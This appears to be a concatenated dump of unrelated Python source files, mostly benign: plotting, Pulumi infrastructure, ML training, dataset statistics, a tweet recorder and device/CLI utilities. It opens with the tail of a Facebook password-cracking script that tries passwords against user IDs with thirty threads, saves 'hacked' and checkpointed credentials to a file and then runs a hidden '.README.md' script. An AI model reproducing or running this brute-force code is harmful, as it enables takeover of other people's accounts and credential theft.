oks.append(c + user + pass20)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass20 + '\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k + c + user + '|' + pass20 + '\n')
cps.close()
cpb.append(c + user + pass20)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print 50 * '-'
print '[\xe2\x9c\x93] \x1b[1;96mPROCESS HAS BEEN COMPLETED....'
print '[\xe2\x9c\x93] \x1b[1;96mTOTAL HACKED/CHECKPOINT : ' + str(len(oks)) + '/' + str(len(cpb))
print '[\xe2\x9c\x93] \x1b[1;96mCP FILE HAS BEEN SAVED : save/checkpoint.txt'
raw_input('\n[\x1b[1;96mPRESS ENTER TO GO BACK]')
os.system('python2 .README.md')
if __name__ == '__main__':
babaindseven() | StarcoderdataPython |
1763675 | <reponame>ashdnazg/toppy<gh_stars>0
import numpy as np
from ..system_stat import MemoryStat
from . import common
from .animated import AnimatedAxes
class MemoryPlotter(AnimatedAxes):
def __init__(self, mem=None):
self.mem = mem or MemoryStat()
def setup(self, axes, x):
self.mem.setup()
self.y_mem = common.none_array(x.size)
self.y_swap = common.none_array(x.size)
self.line_mem = axes.plot(x, self.y_mem, label='Memory')[0]
self.line_swap = axes.plot(x, self.y_swap, label='Swap')[0]
self.lines = [self.line_mem, self.line_swap]
axes.set_title('Memory')
axes.set_ylabel('% Memory')
axes.set_xlim(x.min(), x.max())
axes.set_ylim(0, 100)
axes.tick_params('x', bottom=False, labelbottom=False)
axes.grid(True, axis='y')
axes.legend()
return self.lines
def update(self):
self.mem.update()
common.additem_cyclic_inplace(self.y_mem, self.mem.mem.used * 100 / self.mem.mem.total)
common.additem_cyclic_inplace(self.y_swap, self.mem.swap.used * 100 / self.mem.swap.total)
self.line_mem.set_ydata(self.y_mem)
self.line_swap.set_ydata(self.y_swap)
return self.lines
| StarcoderdataPython |
1709374 | from argparse import ArgumentParser, Namespace
def generate_words(language: str = 'english', count: int = 24) -> str:
from mnemonic import Mnemonic
mnemonic = Mnemonic(language)
return mnemonic.generate(strength=int(count * 10.67))
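# The 10.67 factor above appears to follow the BIP-39 relation between word
# count and entropy (entropy bits ~= words * 32 / 3), so the common counts map
# as follows (a sanity check, not new behaviour):
#   generate_words(count=12)  # strength = int(12 * 10.67) = 128 bits
#   generate_words(count=24)  # strength = int(24 * 10.67) = 256 bits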
def create_parser() -> ArgumentParser:
from hathor.cli.util import create_parser
parser = create_parser()
parser.add_argument('--language', help='Words language')
parser.add_argument('--count', type=int, help='Word count')
return parser
def execute(args: Namespace) -> None:
kwargs = {}
if args.language:
kwargs['language'] = args.language
if args.count:
kwargs['count'] = args.count
print(generate_words(**kwargs))
def main():
parser = create_parser()
args = parser.parse_args()
execute(args)
| StarcoderdataPython |
40662 | <reponame>legitbee/pulumi-ovh<filename>sdk/python/pulumi_ovh/get_vps.py
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = [
'GetVpsResult',
'AwaitableGetVpsResult',
'get_vps',
'get_vps_output',
]
@pulumi.output_type
class GetVpsResult:
"""
A collection of values returned by getVps.
"""
def __init__(__self__, cluster=None, datacenter=None, displayname=None, id=None, ips=None, keymap=None, memory=None, model=None, name=None, netbootmode=None, offertype=None, service_name=None, slamonitoring=None, state=None, type=None, vcore=None, zone=None):
if cluster and not isinstance(cluster, str):
raise TypeError("Expected argument 'cluster' to be a str")
pulumi.set(__self__, "cluster", cluster)
if datacenter and not isinstance(datacenter, dict):
raise TypeError("Expected argument 'datacenter' to be a dict")
pulumi.set(__self__, "datacenter", datacenter)
if displayname and not isinstance(displayname, str):
raise TypeError("Expected argument 'displayname' to be a str")
pulumi.set(__self__, "displayname", displayname)
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if ips and not isinstance(ips, list):
raise TypeError("Expected argument 'ips' to be a list")
pulumi.set(__self__, "ips", ips)
if keymap and not isinstance(keymap, str):
raise TypeError("Expected argument 'keymap' to be a str")
pulumi.set(__self__, "keymap", keymap)
if memory and not isinstance(memory, int):
raise TypeError("Expected argument 'memory' to be a int")
pulumi.set(__self__, "memory", memory)
if model and not isinstance(model, dict):
raise TypeError("Expected argument 'model' to be a dict")
pulumi.set(__self__, "model", model)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if netbootmode and not isinstance(netbootmode, str):
raise TypeError("Expected argument 'netbootmode' to be a str")
pulumi.set(__self__, "netbootmode", netbootmode)
if offertype and not isinstance(offertype, str):
raise TypeError("Expected argument 'offertype' to be a str")
pulumi.set(__self__, "offertype", offertype)
if service_name and not isinstance(service_name, str):
raise TypeError("Expected argument 'service_name' to be a str")
pulumi.set(__self__, "service_name", service_name)
if slamonitoring and not isinstance(slamonitoring, bool):
raise TypeError("Expected argument 'slamonitoring' to be a bool")
pulumi.set(__self__, "slamonitoring", slamonitoring)
if state and not isinstance(state, str):
raise TypeError("Expected argument 'state' to be a str")
pulumi.set(__self__, "state", state)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
if vcore and not isinstance(vcore, int):
raise TypeError("Expected argument 'vcore' to be a int")
pulumi.set(__self__, "vcore", vcore)
if zone and not isinstance(zone, str):
raise TypeError("Expected argument 'zone' to be a str")
pulumi.set(__self__, "zone", zone)
@property
@pulumi.getter
def cluster(self) -> str:
return pulumi.get(self, "cluster")
@property
@pulumi.getter
def datacenter(self) -> Mapping[str, str]:
return pulumi.get(self, "datacenter")
@property
@pulumi.getter
def displayname(self) -> str:
return pulumi.get(self, "displayname")
@property
@pulumi.getter
def id(self) -> str:
"""
The provider-assigned unique ID for this managed resource.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def ips(self) -> Sequence[str]:
return pulumi.get(self, "ips")
@property
@pulumi.getter
def keymap(self) -> str:
return pulumi.get(self, "keymap")
@property
@pulumi.getter
def memory(self) -> int:
return pulumi.get(self, "memory")
@property
@pulumi.getter
def model(self) -> Mapping[str, str]:
return pulumi.get(self, "model")
@property
@pulumi.getter
def name(self) -> str:
return pulumi.get(self, "name")
@property
@pulumi.getter
def netbootmode(self) -> str:
return pulumi.get(self, "netbootmode")
@property
@pulumi.getter
def offertype(self) -> str:
return pulumi.get(self, "offertype")
@property
@pulumi.getter(name="serviceName")
def service_name(self) -> str:
return pulumi.get(self, "service_name")
@property
@pulumi.getter
def slamonitoring(self) -> bool:
return pulumi.get(self, "slamonitoring")
@property
@pulumi.getter
def state(self) -> str:
return pulumi.get(self, "state")
@property
@pulumi.getter
def type(self) -> str:
return pulumi.get(self, "type")
@property
@pulumi.getter
def vcore(self) -> int:
return pulumi.get(self, "vcore")
@property
@pulumi.getter
def zone(self) -> str:
return pulumi.get(self, "zone")
class AwaitableGetVpsResult(GetVpsResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetVpsResult(
cluster=self.cluster,
datacenter=self.datacenter,
displayname=self.displayname,
id=self.id,
ips=self.ips,
keymap=self.keymap,
memory=self.memory,
model=self.model,
name=self.name,
netbootmode=self.netbootmode,
offertype=self.offertype,
service_name=self.service_name,
slamonitoring=self.slamonitoring,
state=self.state,
type=self.type,
vcore=self.vcore,
zone=self.zone)
def get_vps(service_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetVpsResult:
"""
Use this data source to access information about an existing resource.
"""
__args__ = dict()
__args__['serviceName'] = service_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('ovh:index/getVps:getVps', __args__, opts=opts, typ=GetVpsResult).value
return AwaitableGetVpsResult(
cluster=__ret__.cluster,
datacenter=__ret__.datacenter,
displayname=__ret__.displayname,
id=__ret__.id,
ips=__ret__.ips,
keymap=__ret__.keymap,
memory=__ret__.memory,
model=__ret__.model,
name=__ret__.name,
netbootmode=__ret__.netbootmode,
offertype=__ret__.offertype,
service_name=__ret__.service_name,
slamonitoring=__ret__.slamonitoring,
state=__ret__.state,
type=__ret__.type,
vcore=__ret__.vcore,
zone=__ret__.zone)
@_utilities.lift_output_func(get_vps)
def get_vps_output(service_name: Optional[pulumi.Input[str]] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> pulumi.Output[GetVpsResult]:
"""
Use this data source to access information about an existing resource.
"""
...
| StarcoderdataPython |
4841955 | """
Author: <NAME>, 2018
Github: https://github.com/codewithsk/graph-cnn.mxnet
The Ohio State University
Graph Convolutional Network
File: train.py
Description: Training script for graph convolutional network
"""
import time
import argparse
import numpy as np
import mxnet as mx
from mxnet import autograd, gluon
from utils import load_data, accuracy
from model import GCN
# Parse command line arguments
parser = argparse.ArgumentParser() # pylint: disable=invalid-name
parser.add_argument('--num-gpu', type=int, default=-1,
help='Select GPU to train on. -1 for CPU.')
parser.add_argument('--fastmode', action='store_true', default=False,
help='Validate during training pass.')
parser.add_argument('--seed', type=int, default=42, help='Random seed.')
parser.add_argument('--epochs', type=int, default=200,
help='Number of epochs to train.')
parser.add_argument('--lr', type=float, default=0.01,
help='Initial learning rate.')
parser.add_argument('--weight_decay', type=float, default=5e-4,
help='Weight decay (L2 loss on parameters).')
parser.add_argument('--hidden', type=int, default=16,
help='Number of hidden units.')
parser.add_argument('--dropout', type=float, default=0.0,
help='Dropout rate (1 - keep probability).')
parser.add_argument('--optim', type=str, default='adam',
help='What optimizer to use. Can be any accepted optimizer from MXnet.optimizer Default is adam')
args = parser.parse_args() #pylint: disable=invalid-name
# Set up context.
ctx = None # pylint: disable=invalid-name
if args.num_gpu == -1:
ctx = mx.cpu() # pylint: disable=invalid-name
else:
ctx = mx.gpu(args.num_gpu) # pylint: disable=invalid-name
# Set seed for random number generators in numpy and mxnet
np.random.seed(args.seed)
mx.random.seed(args.seed)
adj, features, labels, idx_train, idx_val, idx_test = load_data(ctx=ctx) # pylint: disable=invalid-name
model = GCN(nfeat=features.shape[1], # pylint: disable=invalid-name
nhid=args.hidden,
nclass=int(labels.max().asnumpy().item()) + 1,
dropout=args.dropout)
model.collect_params().initialize(ctx=ctx)
trainer = gluon.Trainer(model.collect_params(), # pylint: disable=invalid-name
                        args.optim,
                        {'learning_rate': args.lr,})
# Note: Original implementation uses
# Negative Log Likelihood and not
# SoftmaxCrossEntropyLoss
loss = gluon.loss.SoftmaxCrossEntropyLoss() # pylint: disable=invalid-name
accs = [] # pylint: disable=invalid-name
for epoch in range(args.epochs):
t = time.time()
with autograd.record():
output = model(features, adj)
loss_train = loss(output[idx_train], labels[idx_train])
acc_train = accuracy(output[idx_train], labels[idx_train])
accs.append(acc_train)
loss_train.backward()
print('Epoch: {:04d}'.format(epoch+1),
'loss_train: {:.4f}'.format(np.mean(loss_train.asnumpy())),
'acc_train: {:.4f}'.format(acc_train),
'time: {:.4f}s'.format(time.time() - t))
trainer.step(1)
print(
'Training Accuracy: ', accuracy(output[idx_train], labels[idx_train]), '\n',
'Validation Accuracy: ', accuracy(output[idx_val], labels[idx_val]), '\n',
'Test Accuracy: ', accuracy(output[idx_test], labels[idx_test])
)
| StarcoderdataPython |
140362 | <reponame>ReesaJohn/3D60
import argparse
import sys
import os
import argparse
import csv
import itertools
import cv2
import numpy
import torch
def parse_arguments(args):
desc = (
"3D60 dataset statistics calculation."
)
parser = argparse.ArgumentParser(description=desc)
# paths
parser.add_argument("--suncg_path", type=str,\
default=argparse.SUPPRESS,\
help="Path to the rendered data of SunCG")
parser.add_argument("--s2d3d_path", type=str,\
default=argparse.SUPPRESS,\
help="Path to the rendered data of Stanford2D3D")
parser.add_argument("--m3d_path", type=str,\
default=argparse.SUPPRESS,\
help="Path to the rendered data of Matterport3D")
parser.add_argument("--stats_path", type=str,\
default=".\\splits\\", \
help="Output path where the calculate dataset statistics files will be saved at.")
parser.add_argument("--max_depth", type=float,\
default=10, help="Max valid depth value for the statistics calculations")
return parser.parse_known_args(args)
def load_depth(filename, data_type=torch.float32):
dtmp = numpy.array(cv2.imread(filename, cv2.IMREAD_ANYDEPTH))
depth = torch.from_numpy(dtmp).type(data_type)
return depth.reshape(1, 1, depth.shape[0], depth.shape[1])
def calc_stats(name, folder, max_depth_meters=10.0):
depth_files = [f for f in os.listdir(folder) if ".exr" in f and "_depth_" in f]
total = torch.zeros(int(max_depth_meters * 2))
perc = torch.zeros(int(max_depth_meters * 2))
less_than_half_meter = 0.0
over_five_meters = 0.0
count = 0
for depth_file in depth_files:
filename = os.path.join(folder, depth_file)
depth = load_depth(filename)
b, c, h, w = depth.size()
depth = depth.reshape(h * w)
hist = torch.histc(depth, bins=int(2 * max_depth_meters), \
min=0, max=max_depth_meters)
total += hist
invalid = torch.sum(torch.isnan(depth)) + torch.sum(torch.isinf(depth)) \
+ torch.sum(depth > max_depth_meters)
valid = depth.size()[0] - invalid
if valid > 0:
perc += hist / valid
less_than_half_meter += torch.sum(depth < 0.5).float() / float(valid)
over_five_meters += torch.sum(depth > 5.0).float() / float(valid)
count += 1
return {
"name": name,
"total": total,
"perc": perc / count * 100,
'less0.5': less_than_half_meter / count * 100,
'over5': over_five_meters / count * 100
}
def calc_m3d_stats(m3d_path, max_depth_meters=10.0):
print("Calculating M3D stats...")
    return calc_stats("M3D", m3d_path, max_depth_meters)
def calc_s2d3d_stats(s2d3d_path, max_depth_meters=10.0):
print("Calculating S2D3D stats...")
stats = []
count = 0
total = torch.zeros(int(2 * max_depth_meters))
perc = torch.zeros(int(2 * max_depth_meters))
less_than_half_meter = 0
over_five_meters = 0
for area in os.listdir(s2d3d_path):
        stats.append(calc_stats("S2D3D", os.path.join(s2d3d_path, area), max_depth_meters))
for area_stats in stats:
total += area_stats['total']
perc += area_stats['perc']
less_than_half_meter += area_stats['less0.5']
over_five_meters += area_stats['over5']
count = len(stats)
return {
"name" : "S2D3D",
"total": total,
"perc": perc / count,
'less0.5': less_than_half_meter / count,
'over5': over_five_meters / count
}
def calc_suncg_stats(suncg_path, max_depth_meters=10.0):
print("Calculating SunCG stats...")
    return calc_stats("SCG", suncg_path, max_depth_meters)
def pairwise(iterable):
"s -> (s0,s1), (s1,s2), (s2, s3), ..."
a, b = itertools.tee(iterable)
next(b, None)
return zip(a, b)
def dump_stats(stats, args):
print("Dumping stats...")
for stat in stats:
with open(os.path.join(args.stats_path, '{}_stats.csv'.format(stat['name'])), mode='w') as csv_file:
stats_writer = csv.writer(csv_file, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
headers = ["{}-{}".format(p[0] / 2.0, p[1] / 2.0) for p in pairwise(range(0, 1 + 2 * int(args.max_depth)))]
headers += ["<0.5", ">5"]
stats_writer.writerow(headers)
stats_writer.writerow([str(float(v)) for v in stat['total']])
stats_writer.writerow([str(float(v) / 100.0) for v in stat['perc']] \
+ [float(stat['less0.5']) / 100.0, float(stat['over5']) / 100.0])
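# With the default max_depth of 10 the header row written above is
#   0.0-0.5, 0.5-1.0, ..., 9.5-10.0, <0.5, >5
# i.e. one column per 0.5 m histogram bin, matching the int(2 * max_depth_meters)
# bins used in calc_stats.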
if __name__ == "__main__":
args, unknown = parse_arguments(sys.argv)
stats = []
''' Matterport3D '''
if 'm3d_path' in args:
m3d_stats = calc_m3d_stats(args.m3d_path, args.max_depth)
stats.append(m3d_stats)
''' Stanford2D3D '''
if 's2d3d_path' in args:
s2d3d_stats = calc_s2d3d_stats(args.s2d3d_path, args.max_depth)
stats.append(s2d3d_stats)
''' SunCG '''
if 'suncg_path' in args:
suncg_stats = calc_suncg_stats(args.suncg_path, args.max_depth)
stats.append(suncg_stats)
dump_stats(stats, args)
print("Done.") | StarcoderdataPython |
86932 | from ImageEmbeddings import ImageEmbeddings
from celery import Task, Celery
from cairosvg import svg2png
from numpy import array
from PIL import Image
from pickle import load
from base64 import b64encode
from io import BytesIO
from tempfile import NamedTemporaryFile
def svg2array(bytestring=None, size=32, tran_color=255):
if bytestring is None:
return None
f = NamedTemporaryFile()
svg2png(bytestring=bytestring, write_to=f)
img = Image.open(f)
img = array(img.resize((size, size)))
img[img[:, :, 3] == 0] = [tran_color, tran_color, tran_color, 0]
f.close()
return img[:, :, 0:3]
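# Rough usage sketch for svg2array above (the inline SVG is a made-up example;
# any SVG byte string that cairosvg can rasterise behaves the same way):
#   arr = svg2array(b'<svg xmlns="http://www.w3.org/2000/svg" width="8" height="8"/>')
#   arr.shape  # -> (32, 32, 3); fully transparent pixels are forced to tran_color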
def array2bytes(arr):
img = Image.fromarray(arr)
byte_io = BytesIO()
img.save(byte_io, 'JPEG')
im_data = byte_io.getvalue()
return 'data:image/jpeg;base64,' + b64encode(im_data).decode()
class getSuggestions(Task):
_img_emb = None
def __init__(self):
        with open('opts.conf', 'rb') as conf_file:
            self.opts = load(conf_file)
@property
def img_emb(self):
if self._img_emb is None:
self._img_emb = ImageEmbeddings(self.opts.model, verbose=self.opts.verbose, load_in_memory=self.opts.memory,
layer=self.opts.layer, forceRecal=self.opts.forceRecal)
return self._img_emb
def run(self, data):
arr = svg2array(data)
if arr is None:
return None
self.img_emb.calculateDistances(arr)
return array2bytes(self.img_emb.viewCollageComparison(res_size=20))
app = Celery('tasks', broker='redis://localhost:6379/0', backend='redis://localhost:6379/0')
getSug = getSuggestions()
app.register_task(getSug)
| StarcoderdataPython |
163193 | <reponame>Dexterp37/twitter_sentimap
import json
import logging
import os
logger = logging.getLogger(__name__)
# How many tweets to put in a single JSON file? This directly influences the
# size of each chunk file and how often the buffer is flushed to disk.
ENTRIES_PER_FILE = 500
class SourceRecorder:
""" Write the incoming data to a set of valid JSON files.
    The data is written in chunks, with each file containing
    ENTRIES_PER_FILE tweets.
"""
def __init__(self, data_dir):
self._data_dir = data_dir
self._buffer = []
self._file_counter = 0
# Make sure the data_dir exists.
if not os.path.exists(self._data_dir):
os.makedirs(self._data_dir)
def _flush_buffer(self):
# Generate a filename for this chunk.
file_name = "chunk-{}.json".format(self._file_counter)
file_path = os.path.join(self._data_dir, file_name)
# Save the data from the buffer to the file.
with open(file_path, 'wt') as outfile:
json.dump(self._buffer, outfile)
# Empty the buffer and increase the file counter.
self._buffer = []
self._file_counter = self._file_counter + 1
def on_data_available(self, json_data):
logger.debug("Received data: {}\n".format(json.dumps(json_data)))
self._buffer.append(json_data)
        if len(self._buffer) >= ENTRIES_PER_FILE:
self._flush_buffer()
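# Minimal usage sketch (an assumption about how the recorder is driven; the
# actual stream listener lives elsewhere in the project):
#   recorder = SourceRecorder("data/tweets")
#   for tweet in parsed_tweet_stream():   # hypothetical iterable of tweet dicts
#       recorder.on_data_available(tweet)
# Chunk files named chunk-0.json, chunk-1.json, ... accumulate under data/tweets.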
| StarcoderdataPython |
1711218 | import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sn
import pickle
from siuba import *
from datetime import datetime as dt
# Opening SHAP results with pickle
infile = open("lgbm_dict", "rb")
lgbm_dict = pickle.load(infile)
asdas=pickle.load(infile)
df_r2 = pd.DataFrame(columns=["game_id", "year", "r2_test", "r2_train"])
df_RMSE = pd.DataFrame(columns=["game_id", "year", "test", "train"])
for name, values in lgbm_dict.items():
r2 = pd.DataFrame({"game_id": [name], "year": [values[4]], "r2_test": [values[1]], "r2_train":[values[3]]})
df_r2 = df_r2.append(r2)
RMSE = pd.DataFrame({"game_id": [name], "year": [values[4]], "test": [values[0]], "train": [values[2]]})
df_RMSE = df_RMSE.append(RMSE)
# R2
r2_melted = df_r2[df_r2.r2_test > 0].melt(id_vars="game_id") >> arrange(_.date)
sn.lineplot(data = r2_melted, x = "game_id", y = "value", hue = "variable")
r2_melted.to_csv("C:/Users/USER/Downloads/r2_results.csv")
# RMSE
RMSE_melted = df_RMSE.melt(id_vars="game_id") >> arrange(_.date)
sn.lineplot(data = RMSE_melted, x = "game_id", y = "value", hue = "variable")
RMSE_melted.to_csv("C:/Users/USER/Downloads/RMSE_results.csv") | StarcoderdataPython |
3399444 | <filename>Python tests/classes_objects.py
lottery_player_dict = {
'name': 'Rolf',
'numbers': (5, 9, 12, 3, 1, 21)
}
class LotteryPlayer:
def __init__(self, name):
self.name = name
self.numbers = (5, 9, 12, 3, 1, 21)
def total(self):
return sum(self.numbers)
player_one = LotteryPlayer('Rolf')
player_one.numbers = (1, 2, 3, 6, 7, 8)
player_two = LotteryPlayer('John')
# print(player_two.total())
# print(player_one.numbers == player_two.numbers)
##
class Student:
def __init__(self, name, school):
self.name = name
self.school = school
self.marks = []
def average(self):
return sum(self.marks) / len(self.marks)
anna = Student('Anna', 'MIT')
anna.marks.append(18)
anna.marks.append(10)
anna.marks.append(33)
anna.marks.append(51)
print(anna.name, anna.school, anna.marks, anna.average()) | StarcoderdataPython |
115070 | # This script demonstrates changing the state of hardware
# handshake lines. While the script is running, you can see
# the DTR LED in the CoolTerm window blinking.
#
# Author: <NAME>, 04-30-2020
# CoolTerm version: 1.7.0
import sys
import time
import CoolTerm
s = CoolTerm.CoolTermSocket()
# Get the ID of the first open window
ID = s.GetWindowID(0)
if ID < 0:
print("No open windows")
sys.exit()
# Open the serial port
if s.Connect(ID):
print("Toggling DTR. Press CTRL-C to exit.")
try:
while True: # endless loop
s.SetDTR(ID, not s.GetDTR(ID))
time.sleep(0.5)
except KeyboardInterrupt:
pass
# Close the port
s.Disconnect(ID)
else:
print("Not Connected")
| StarcoderdataPython |
1708652 | <reponame>zsiciarz/jamchemy
import strawberry
from .mutations import Mutation
from .queries import Query
from .subscriptions import Subscription
schema = strawberry.Schema(query=Query, mutation=Mutation, subscription=Subscription)
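# Illustrative only: with strawberry's Schema API a query can be executed
# synchronously; the query string below is an assumption about what Query exposes.
#
#   result = schema.execute_sync("{ __typename }")
#   print(result.data, result.errors)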
| StarcoderdataPython |
190258 | <filename>environment.py
"""The Environment class and its helper classes."""
import ipaddress
from typing import Any, Dict, List
import pulumi_vsphere as vsphere
class Network:
"""Represents the IPv4 network being used in the environment."""
def __init__(self, network_id: str, subnet: ipaddress.IPv4Network, dns_servers: List[str], domains: List[str]):
""" Initializes Network with the given parameters.
Args:
network_id: The name of the network as configured in vSphere (typically the port group name)
subnet: The IPv4 subnet (i.e. 192.168.1.0/24)
dns_servers: The DNS servers for the environment
domains: The search domains for the environment
"""
self.id = network_id
self.subnet = subnet
self.dns_servers = dns_servers
self.domains = domains
class NodeSettings:
"""Represents the settings used to configure a specific node type.
When a node is created there are certain values that may differ depending on whether the node is of type master or
of type worker. This class holds this configuration information for each of those types.
"""
def __init__(self, name: str, network_offset: int, cpus: int, memory: int):
""" Initializes NodeSettings with the given parameters.
Args:
name: A format string in the form of 'NAME{num}' which will be used to generate node names
network_offset: The offset used to generate a node's IPv4 address
cpus: The number of CPUs that will be configured when this node type is created
memory: The amount of memory in MB that will be configured when this node type is created
"""
self.name = name
self.network_offset = network_offset
self.cpus = cpus
self.memory = memory
class ResourcePool:
"""Represents a resource pool in which the underlying virtual machine of a node will be deployed in.
When nodes are created they are assigned a resource group which determines where the underlying virtual machine for
the node will be created. The environment may have one or more resource pools defined to deploy nodes in. Each
resource pool has an associated weight which determines the distribution of nodes against it. A resource pool which
has a higher weight will have more nodes distributed in it. By default the distribution is round-robin style,
however, in the case of an uneven number of nodes the resource pools with higher weights will take precedence.
"""
def __init__(self, id: str, datastore_id: str, weight: int):
""" Initializes ResourcePool with the given parameters.
Args:
id: The unique resource pool id as defined in vSphere
datastore_id: The unique id of the associated datastore as defined in vSphere
weight: The weight used to set the priority of this resource pool
"""
self.id = id
self.datastore_id = datastore_id
self.weight = weight
@classmethod
def from_config(cls, dc: vsphere.Datacenter, pool_config: Dict[str, Any]):
"""Creates and returns a resource pool using the given resource pool configuration data.
Args:
dc: The vSphere datacenter this resource group is associated with
pool_config: A subset of configuration data (env['pools'][x]) used to configure the resource pool
Returns:
A ResourcePool object configured using the given parameters
"""
if pool_config['type'].lower() == 'cluster':
return ResourcePool(
id=vsphere.get_compute_cluster(str(dc.id), pool_config['name']).resource_pool_id,
datastore_id=vsphere.get_datastore(str(dc.id), name=pool_config['datastore']).id,
weight=pool_config['weight']
)
else:
return ResourcePool(
id=vsphere.get_host(str(dc.id), pool_config['name']).resource_pool_id,
datastore_id=vsphere.get_datastore(str(dc.id), name=pool_config['datastore']).id,
weight=pool_config['weight']
)
class Environment:
"""Represents an environment in which a cluster is created and nodes are deployed in.
Environments are typically unique per Pulumi stack. For instance, a dev stack may have a unique environment which
differs from the prod stack. The Environment class holds these unique configurations and serves as the primary
source of truth used to configure a cluster and its associated nodes. The values used to configure an environment
are held in a stack's configuration data. For details on each configuration value please refer to the README.
"""
def __init__(self, name,
datacenter: vsphere.Datacenter,
domain: str,
pools: List[ResourcePool],
network: Network,
node_template: vsphere.VirtualMachine,
master_config: NodeSettings,
worker_config: NodeSettings,
vault_address: str):
""" Initializes Environment using the given parameters."""
self.name = name
self.datacenter = datacenter
self.domain = domain
self.pools = pools
self.network = network
self.node_template = node_template
self.master_config = master_config
self.worker_config = worker_config
self.vault_address = vault_address
@classmethod
def from_config(cls, config: Dict[str, Any]):
dc = vsphere.get_datacenter(config['datacenter'])
# Build resource pools
pools = []
for pool in config['pools']:
pools.append(ResourcePool.from_config(dc, pool))
return Environment(
name=config['name'],
datacenter=dc,
domain=config['domain'],
pools=pools,
network=Network(
network_id=str(vsphere.get_network(dc.id, name=config['network']['name']).id),
subnet=ipaddress.ip_network(config['network']['subnet']),
dns_servers=config['network']['dns_servers'],
domains=config['network']['domains']
),
node_template=vsphere.get_virtual_machine(dc.id, name=config['template']),
master_config=NodeSettings(
name=config['node']['master']['name'],
network_offset=config['node']['master']['network_offset'],
cpus=config['node']['master']['cpus'],
memory=config['node']['master']['memory']
),
worker_config=NodeSettings(
name=config['node']['worker']['name'],
network_offset=config['node']['worker']['network_offset'],
cpus=config['node']['worker']['cpus'],
memory=config['node']['worker']['memory']
),
vault_address=config['vault_address']
)
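# Illustrative shape of the config dict consumed by Environment.from_config
# (all values below are made-up placeholders; resolving them requires access to
# a real vSphere endpoint):
#
#   config = {
#       "name": "dev",
#       "datacenter": "dc-01",
#       "domain": "example.local",
#       "pools": [{"type": "cluster", "name": "cluster-01",
#                  "datastore": "datastore-01", "weight": 2}],
#       "network": {"name": "VM Network", "subnet": "192.168.10.0/24",
#                   "dns_servers": ["192.168.10.1"], "domains": ["example.local"]},
#       "template": "ubuntu-20.04-template",
#       "node": {"master": {"name": "master{num}", "network_offset": 10,
#                           "cpus": 2, "memory": 4096},
#                "worker": {"name": "worker{num}", "network_offset": 20,
#                           "cpus": 4, "memory": 8192}},
#       "vault_address": "https://vault.example.local:8200",
#   }
#   env = Environment.from_config(config)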
| StarcoderdataPython |
1754403 | <filename>vdibroker/api/v1/views/session_view.py<gh_stars>10-100
# Copyright 2017 Cloudbase Solutions, SRL.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import itertools
def _format_session(req, session, keys=None):
def transform(key, value):
if keys and key not in keys:
return
yield (key, value)
return dict(itertools.chain.from_iterable(
transform(k, v) for k, v in session.items()))
def single(req, session):
return {"session": _format_session(req, session)}
def collection(req, sessions):
formatted_sessions = [_format_session(req, m)
for m in sessions]
return {'sessions': formatted_sessions}
| StarcoderdataPython |
24810 | <reponame>securedataplane/preacher
class NEC:
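    """Wrappers around the NEC switch CLI 'show' commands.
    Note: these methods assume that ``self.execute`` and ``main.TRUE`` are
    supplied by the enclosing test framework (e.g. a TestON-style driver base
    class); neither is defined in this file.
    """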
def __init__( self ):
self.prompt = '(.*)'
self.timeout = 60
def show(self, *options, **def_args ):
'''Possible Options :[' access-filter ', ' accounting ', ' acknowledgments ', ' auto-config ', ' axrp ', ' cfm ', ' channel-group ', ' clock ', ' config-lock-status ', ' cpu ', ' dhcp ', ' dot1x ', ' dumpfile ', ' efmoam ', ' environment ', ' file ', ' flash ', ' gsrp ', ' history ', ' igmp-snooping ', ' interfaces ', ' ip ', ' ip-dual ', ' ipv6-dhcp ', ' license ', ' lldp ', ' logging ', ' loop-detection ', ' mac-address-table ', ' mc ', ' memory ', ' mld-snooping ', ' netconf ', ' netstat ', ' ntp ', ' oadp ', ' openflow ', ' port ', ' power ', ' processes ', ' qos ', ' qos-flow ', ' sessions ', ' sflow ', ' spanning-tree ', ' ssh ', ' system ', ' tcpdump ', ' tech-support ', ' track ', ' version ', ' vlan ', ' vrrpstatus ', ' whoami ']'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_ip(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
self.execute( cmd= "show ip "+ arguments, prompt = prompt, timeout = timeout )
return main.TRUE
def show_mc(self, *options, **def_args ):
'''Possible Options :[]'''
arguments= ''
for option in options:
arguments = arguments + option +' '
prompt = def_args.setdefault('prompt',self.prompt)
timeout = def_args.setdefault('timeout',self.timeout)
